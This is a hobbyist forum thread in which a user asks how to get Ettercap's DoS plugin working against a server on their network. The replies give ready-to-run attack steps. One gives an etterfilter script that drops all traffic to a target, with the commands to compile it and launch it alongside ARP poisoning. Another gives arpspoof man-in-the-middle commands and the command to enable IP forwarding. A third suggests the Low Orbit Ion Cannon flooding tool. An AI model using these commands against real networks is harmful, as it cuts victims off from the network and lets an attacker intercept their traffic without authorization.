Overclock.net › Forums › Software, Programming and Coding › Networking & Security › Using Ettercap-GTK for DOS_ATTACK help!
New Posts  All Forums:Forum Nav:

Using Ettercap-GTK for DOS_ATTACK help!

post #1 of 8
Thread Starter 
Alright. So I have been using Back|Track4 R2 for penetration testing on my server. I have been trying to get ettercap-GTK (has the nice interface) to work using it's DOS_ATTACK plugin. I have some questions... seeing as I can't get it to work. Maybe someone could direct me as to how to. Or correct my mistake.

So, I start by opening ettercap-gtk and scanning for hosts. This gives me 'x' amount of hosts on my network. (normally 4-8) Then I open Host List and view all of the IPs and identify my server. (question: when I run this can I DoS a single pc on the network or only the entire network at once?)
After finding my server, I go to manage plugins and select DoS_Attack and it asks me to select a target IP for victim, so I enter the IP of the server, then it asks for a fake IP. So I enter something random that follows the naming pattern of my network that is not in use by any of our systems. (192.168.x.xxx) so it follows the layout. Then it says (trying to remember exactly) plugin started. Starting DOS Attack...
Then nothing happens. And the system works perfectly fine.
Question: Am I doing something wrong there?
Question: Do I need to ARP poison them for this to work?
Question: Do I set router as target 1 and the server as target 2 if I do need to ARP poison?
Question: What exactly does Unoffensive mode / Offensive mode do? (explanation in 'help' didn't help much)


Thanks SOOO MUCH in advance!!! Been mucking around with this for awhile and it's boggling my mind a lil.
Edited by CrazyDiamond - 4/19/11 at 3:48am
Hellbringer
(15 items)
 
Guardian
(9 items)
 
 
CPUMotherboardGraphicsRAM
Intel Core i7-6700K Skylake ASUS MAXIMUS VIII HERO SAPPHIRE 100311-2SR Radeon HD 6970 2GB GDDR5 G.SKILL Trident Z 16GB (2x8GB) DDR4 3200MHz 14-... 
Hard DriveHard DriveOptical DriveCooling
Samsung 950 Pro 512GB PCIe M.2 SSD WD Black 2TB 7200RPM SATAIII HDD ASUS Zen OpticalDrive USB G.Skill Turbulence II RAM Fan 
OSMonitorKeyboardPower
Microsoft Windows 10 Home Premium 64-bit Samsung BX2350 23" 1080p 2ms LED backlit S.T.R.I.K.E. 7 EVGA SuperNova G2 1000W Modular Power Supply 
CaseMouseAudio
Thermaltake Core P5 Open-Air Chassis Saitek Cyborg R.A.T. 7 The Infection Logitech Z5500 5.1 Surround 
  hide details  
Reply
Hellbringer
(15 items)
 
Guardian
(9 items)
 
 
CPUMotherboardGraphicsRAM
Intel Core i7-6700K Skylake ASUS MAXIMUS VIII HERO SAPPHIRE 100311-2SR Radeon HD 6970 2GB GDDR5 G.SKILL Trident Z 16GB (2x8GB) DDR4 3200MHz 14-... 
Hard DriveHard DriveOptical DriveCooling
Samsung 950 Pro 512GB PCIe M.2 SSD WD Black 2TB 7200RPM SATAIII HDD ASUS Zen OpticalDrive USB G.Skill Turbulence II RAM Fan 
OSMonitorKeyboardPower
Microsoft Windows 10 Home Premium 64-bit Samsung BX2350 23" 1080p 2ms LED backlit S.T.R.I.K.E. 7 EVGA SuperNova G2 1000W Modular Power Supply 
CaseMouseAudio
Thermaltake Core P5 Open-Air Chassis Saitek Cyborg R.A.T. 7 The Infection Logitech Z5500 5.1 Surround 
  hide details  
Reply
post #2 of 8
Can you use this program "Low Orbit Ion Cannon" ?
ASPIRE 5750G
(13 items)
 
  
CPUMotherboardGraphicsRAM
i5 Sandy Bridge @ 2900 Mhz Intel ID0104 GT 540M 2GB DX11 4GB DDR3 @ 1333/CL6 
Hard DriveOptical DriveOSMonitor
Toshiba 640GB Slimtype DVD Win7 Home Premium 64bit LG D0250 1366x768 
PowerCaseMouse Pad
90W Adapter 15.6 inch Elantech 
  hide details  
Reply
ASPIRE 5750G
(13 items)
 
  
CPUMotherboardGraphicsRAM
i5 Sandy Bridge @ 2900 Mhz Intel ID0104 GT 540M 2GB DX11 4GB DDR3 @ 1333/CL6 
Hard DriveOptical DriveOSMonitor
Toshiba 640GB Slimtype DVD Win7 Home Premium 64bit LG D0250 1366x768 
PowerCaseMouse Pad
90W Adapter 15.6 inch Elantech 
  hide details  
Reply
post #3 of 8
I suck at this things, but don't you have to select 2 hosts for ARP poison? (victim and router i.e ¿?¿), if that is right the answer to your 3rd question is yes.

+Subs to learn more
post #4 of 8
Thread Starter 
Quote:
Can you use this program "Low Orbit Ion Cannon" ?
lol wut? is that serious or ...?

Quote:
I suck at this things, but don't you have to select 2 hosts for ARP poison? (victim and router i.e ¿?¿), if that is right the answer to your 3rd question is yes.

+Subs to learn more
Yeah for ARP poisoning you need 2 targets. accesspoint/router and victim. But do I need to do ARP poisoning for this DoS Attack? And does router go as target1? I know for sniffing passwords it is target 1 but someone told me sometimes it's target 2??? Idk.
Definitely can't wait to get this cleared up.
Hellbringer
(15 items)
 
Guardian
(9 items)
 
 
CPUMotherboardGraphicsRAM
Intel Core i7-6700K Skylake ASUS MAXIMUS VIII HERO SAPPHIRE 100311-2SR Radeon HD 6970 2GB GDDR5 G.SKILL Trident Z 16GB (2x8GB) DDR4 3200MHz 14-... 
Hard DriveHard DriveOptical DriveCooling
Samsung 950 Pro 512GB PCIe M.2 SSD WD Black 2TB 7200RPM SATAIII HDD ASUS Zen OpticalDrive USB G.Skill Turbulence II RAM Fan 
OSMonitorKeyboardPower
Microsoft Windows 10 Home Premium 64-bit Samsung BX2350 23" 1080p 2ms LED backlit S.T.R.I.K.E. 7 EVGA SuperNova G2 1000W Modular Power Supply 
CaseMouseAudio
Thermaltake Core P5 Open-Air Chassis Saitek Cyborg R.A.T. 7 The Infection Logitech Z5500 5.1 Surround 
  hide details  
Reply
Hellbringer
(15 items)
 
Guardian
(9 items)
 
 
CPUMotherboardGraphicsRAM
Intel Core i7-6700K Skylake ASUS MAXIMUS VIII HERO SAPPHIRE 100311-2SR Radeon HD 6970 2GB GDDR5 G.SKILL Trident Z 16GB (2x8GB) DDR4 3200MHz 14-... 
Hard DriveHard DriveOptical DriveCooling
Samsung 950 Pro 512GB PCIe M.2 SSD WD Black 2TB 7200RPM SATAIII HDD ASUS Zen OpticalDrive USB G.Skill Turbulence II RAM Fan 
OSMonitorKeyboardPower
Microsoft Windows 10 Home Premium 64-bit Samsung BX2350 23" 1080p 2ms LED backlit S.T.R.I.K.E. 7 EVGA SuperNova G2 1000W Modular Power Supply 
CaseMouseAudio
Thermaltake Core P5 Open-Air Chassis Saitek Cyborg R.A.T. 7 The Infection Logitech Z5500 5.1 Surround 
  hide details  
Reply
post #5 of 8
I've used this method
1st you need to create a file for example > dos.eft
then you paste this
Quote:
if (ip.src == 'TARGET IP' || ip.dst == 'TARGET IP') {
drop();
kill();
msg("Packet Killed\
");
}
save & exit

Quote:
etterfilter dos.eft -o dos.ef
and then simply execute

Quote:
ettercap -T -q -F dos.ef -M ARP /VICTIM IP/ // -i interface
the machine
(16 items)
 
  
CPUMotherboardGraphicsRAM
Intel Core i5 4690K @ 4.4 Asus Sabertooth Z97 Mark II MSI GTX 970 G.Skill Sniper 8GB 2133 
Hard DriveCoolingOSMonitor
Samsung 850 EVO 250GB Cryorig R1 Ultimate Windows 7 Ultimate BenQ XL2411Z v2 
KeyboardPowerCaseMouse
Corsair K70 Seasonic P-660 Define S Logitech G303 
Mouse PadAudioAudioAudio
Razer Goliathus Speed O2+ODAC revB Sennheiser HD 600 Samson Go Mic 
  hide details  
Reply
the machine
(16 items)
 
  
CPUMotherboardGraphicsRAM
Intel Core i5 4690K @ 4.4 Asus Sabertooth Z97 Mark II MSI GTX 970 G.Skill Sniper 8GB 2133 
Hard DriveCoolingOSMonitor
Samsung 850 EVO 250GB Cryorig R1 Ultimate Windows 7 Ultimate BenQ XL2411Z v2 
KeyboardPowerCaseMouse
Corsair K70 Seasonic P-660 Define S Logitech G303 
Mouse PadAudioAudioAudio
Razer Goliathus Speed O2+ODAC revB Sennheiser HD 600 Samson Go Mic 
  hide details  
Reply
post #6 of 8
To become a man in the middle by spoofing ARP yes you will need the target as well as the router. For example if we have the following:

Router: 192.168.1.1
Target: 192.168.1.50

Using arpspoof we can become a 'man in the middle' by routing all the target's traffic through your backtrack installation as shown below:

Quote:
arpspoof 192.168.1.50 192.168.1.1
Quote:
arpspoof 192.168.1.1 192.168.1.50
Keep in mind in order to do this you will also need to enable IPv4 forwarding in your kernel and launch these two arpspoof commands in two different terminals so you can keep an eye on them.

Enable IPv4 Forwarding:
Quote:
echo 1 > /proc/sys/net/ipv4/ip_forward
Once you are all setup your target should be able to ping google or whatever else and you should be able to pick up the ICMP echo requests using wireshark or whatever packet sniffer you choose. Hope this helps. Oh and.. dont use this for malicious purposes. Whoever reads this and uses it alongside bad judgement is on their own.

Oh and as for running a denial of service attack. Thats lame. All it does is render the target useless. There are much better attacks that would be worth your time to learn.
Desktop
(13 items)
 
  
CPUMotherboardGraphicsRAM
Q9550 EVGA 780SLi EVGA GTX285SSC 4GB OCZ Reaper HPC Edition 
Hard DriveOptical DriveOSPower
150GB Velociraptor x2 - RAID0 2 - Samsung Write Master's Window 7 64-bit 750 Watt OCZ 60 AMPs on +12v 
CaseMouse
LIAN LI PC-V2110B Black Logitech G3 
  hide details  
Reply
Desktop
(13 items)
 
  
CPUMotherboardGraphicsRAM
Q9550 EVGA 780SLi EVGA GTX285SSC 4GB OCZ Reaper HPC Edition 
Hard DriveOptical DriveOSPower
150GB Velociraptor x2 - RAID0 2 - Samsung Write Master's Window 7 64-bit 750 Watt OCZ 60 AMPs on +12v 
CaseMouse
LIAN LI PC-V2110B Black Logitech G3 
  hide details  
Reply
post #7 of 8
Thread Starter 
Quote:
Originally Posted by IaVoR View Post
I've used this method
1st you need to create a file for example > dos.eft
then you paste this

save & exit



and then simply execute
Thanks, I'll give that a try later.
I'm wondering why I can't get the ettercap DoS_Attack plugin to work tho =/ Anyone have any idea on what I'm doing wrong there?
Hellbringer
(15 items)
 
Guardian
(9 items)
 
 
CPUMotherboardGraphicsRAM
Intel Core i7-6700K Skylake ASUS MAXIMUS VIII HERO SAPPHIRE 100311-2SR Radeon HD 6970 2GB GDDR5 G.SKILL Trident Z 16GB (2x8GB) DDR4 3200MHz 14-... 
Hard DriveHard DriveOptical DriveCooling
Samsung 950 Pro 512GB PCIe M.2 SSD WD Black 2TB 7200RPM SATAIII HDD ASUS Zen OpticalDrive USB G.Skill Turbulence II RAM Fan 
OSMonitorKeyboardPower
Microsoft Windows 10 Home Premium 64-bit Samsung BX2350 23" 1080p 2ms LED backlit S.T.R.I.K.E. 7 EVGA SuperNova G2 1000W Modular Power Supply 
CaseMouseAudio
Thermaltake Core P5 Open-Air Chassis Saitek Cyborg R.A.T. 7 The Infection Logitech Z5500 5.1 Surround 
  hide details  
Reply
Hellbringer
(15 items)
 
Guardian
(9 items)
 
 
CPUMotherboardGraphicsRAM
Intel Core i7-6700K Skylake ASUS MAXIMUS VIII HERO SAPPHIRE 100311-2SR Radeon HD 6970 2GB GDDR5 G.SKILL Trident Z 16GB (2x8GB) DDR4 3200MHz 14-... 
Hard DriveHard DriveOptical DriveCooling
Samsung 950 Pro 512GB PCIe M.2 SSD WD Black 2TB 7200RPM SATAIII HDD ASUS Zen OpticalDrive USB G.Skill Turbulence II RAM Fan 
OSMonitorKeyboardPower
Microsoft Windows 10 Home Premium 64-bit Samsung BX2350 23" 1080p 2ms LED backlit S.T.R.I.K.E. 7 EVGA SuperNova G2 1000W Modular Power Supply 
CaseMouseAudio
Thermaltake Core P5 Open-Air Chassis Saitek Cyborg R.A.T. 7 The Infection Logitech Z5500 5.1 Surround 
  hide details  
Reply
post #8 of 8
Thread Starter 
Quote:
Originally Posted by kc-tr View Post
To become a man in the middle by spoofing ARP yes you will need the target as well as the router. For example if we have the following:

Router: 192.168.1.1
Target: 192.168.1.50

Using arpspoof we can become a 'man in the middle' by routing all the target's traffic through your backtrack installation as shown below:




Keep in mind in order to do this you will also need to enable IPv4 forwarding in your kernel and launch these two arpspoof commands in two different terminals so you can keep an eye on them.

Enable IPv4 Forwarding:


Once you are all setup your target should be able to ping google or whatever else and you should be able to pick up the ICMP echo requests using wireshark or whatever packet sniffer you choose. Hope this helps. Oh and.. dont use this for malicious purposes. Whoever reads this and uses it alongside bad judgement is on their own.

Oh and as for running a denial of service attack. Thats lame. All it does is render the target useless. There are much better attacks that would be worth your time to learn.
Yes. I understand about ARP Poisoning and needing the router as a target as well as the victim, but what I'm mainly curious about is if I need to have that running on the network for the DoS_attack plugin to work properly? Sounds like it shouldn't but I can't seem to get it to work so thought it would be worth pointing out.
And yes, don't use this for malicious purposes anyone reading this thread. For obvious reasons.
And I know there are much better attacks, but i'm trying to start out with some basics and work my way around. Quite new to this
Thanks for the advice and input!
Hellbringer
(15 items)
 
Guardian
(9 items)
 
 
CPUMotherboardGraphicsRAM
Intel Core i7-6700K Skylake ASUS MAXIMUS VIII HERO SAPPHIRE 100311-2SR Radeon HD 6970 2GB GDDR5 G.SKILL Trident Z 16GB (2x8GB) DDR4 3200MHz 14-... 
Hard DriveHard DriveOptical DriveCooling
Samsung 950 Pro 512GB PCIe M.2 SSD WD Black 2TB 7200RPM SATAIII HDD ASUS Zen OpticalDrive USB G.Skill Turbulence II RAM Fan 
OSMonitorKeyboardPower
Microsoft Windows 10 Home Premium 64-bit Samsung BX2350 23" 1080p 2ms LED backlit S.T.R.I.K.E. 7 EVGA SuperNova G2 1000W Modular Power Supply 
CaseMouseAudio
Thermaltake Core P5 Open-Air Chassis Saitek Cyborg R.A.T. 7 The Infection Logitech Z5500 5.1 Surround 
  hide details  
Reply
Hellbringer
(15 items)
 
Guardian
(9 items)
 
 
CPUMotherboardGraphicsRAM
Intel Core i7-6700K Skylake ASUS MAXIMUS VIII HERO SAPPHIRE 100311-2SR Radeon HD 6970 2GB GDDR5 G.SKILL Trident Z 16GB (2x8GB) DDR4 3200MHz 14-... 
Hard DriveHard DriveOptical DriveCooling
Samsung 950 Pro 512GB PCIe M.2 SSD WD Black 2TB 7200RPM SATAIII HDD ASUS Zen OpticalDrive USB G.Skill Turbulence II RAM Fan 
OSMonitorKeyboardPower
Microsoft Windows 10 Home Premium 64-bit Samsung BX2350 23" 1080p 2ms LED backlit S.T.R.I.K.E. 7 EVGA SuperNova G2 1000W Modular Power Supply 
CaseMouseAudio
Thermaltake Core P5 Open-Air Chassis Saitek Cyborg R.A.T. 7 The Infection Logitech Z5500 5.1 Surround 
  hide details  
Reply
New Posts  All Forums:Forum Nav:
  Return Home
  Back to Forum: Networking & Security
Overclock.net › Forums › Software, Programming and Coding › Networking & Security › Using Ettercap-GTK for DOS_ATTACK help!